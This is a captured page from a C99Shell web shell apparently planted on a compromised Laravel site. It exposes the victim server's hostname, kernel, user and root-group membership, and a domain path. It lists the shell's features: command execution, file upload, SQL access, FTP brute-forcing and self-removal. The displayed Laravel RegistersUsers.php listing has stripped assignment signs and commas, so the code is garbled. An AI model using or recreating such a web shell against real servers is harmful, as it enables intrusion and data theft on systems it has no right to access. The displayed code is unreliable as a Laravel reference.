!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-163-generic #173-Ubuntu SMP Tue Oct 14 17:51:00 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smab.picotech.app/public_html/vendor/laravel/ui/auth-backend/   drwxr-xr-x
Free 25.4 GB of 117.98 GB (21.53%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     RegistersUsers.php (1.53 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Illuminate\Foundation\Auth;

use 
Illuminate\Auth\Events\Registered;
use 
Illuminate\Http\JsonResponse;
use 
Illuminate\Http\Request;
use 
Illuminate\Support\Facades\Auth;

trait 
RegistersUsers
{
    use 
RedirectsUsers;

    
/**
     * Show the application registration form.
     *
     * @return \Illuminate\View\View
     */
    
public function showRegistrationForm()
    {
        return 
view('auth.register');
    }

    
/**
     * Handle a registration request for the application.
     *
     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\RedirectResponse|\Illuminate\Http\JsonResponse
     */
    
public function register(Request $request)
    {
        
$this->validator($request->all())->validate();

        
event(new Registered($user $this->create($request->all())));

        
$this->guard()->login($user);

        if (
$response $this->registered($request$user)) {
            return 
$response;
        }

        return 
$request->wantsJson()
                    ? new 
JsonResponse([], 201)
                    : 
redirect($this->redirectPath());
    }

    
/**
     * Get the guard to be used during registration.
     *
     * @return \Illuminate\Contracts\Auth\StatefulGuard
     */
    
protected function guard()
    {
        return 
Auth::guard();
    }

    
/**
     * The user has been registered.
     *
     * @param  \Illuminate\Http\Request  $request
     * @param  mixed  $user
     * @return mixed
     */
    
protected function registered(Request $request$user)
    {
        
//
    
}
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0035 ]--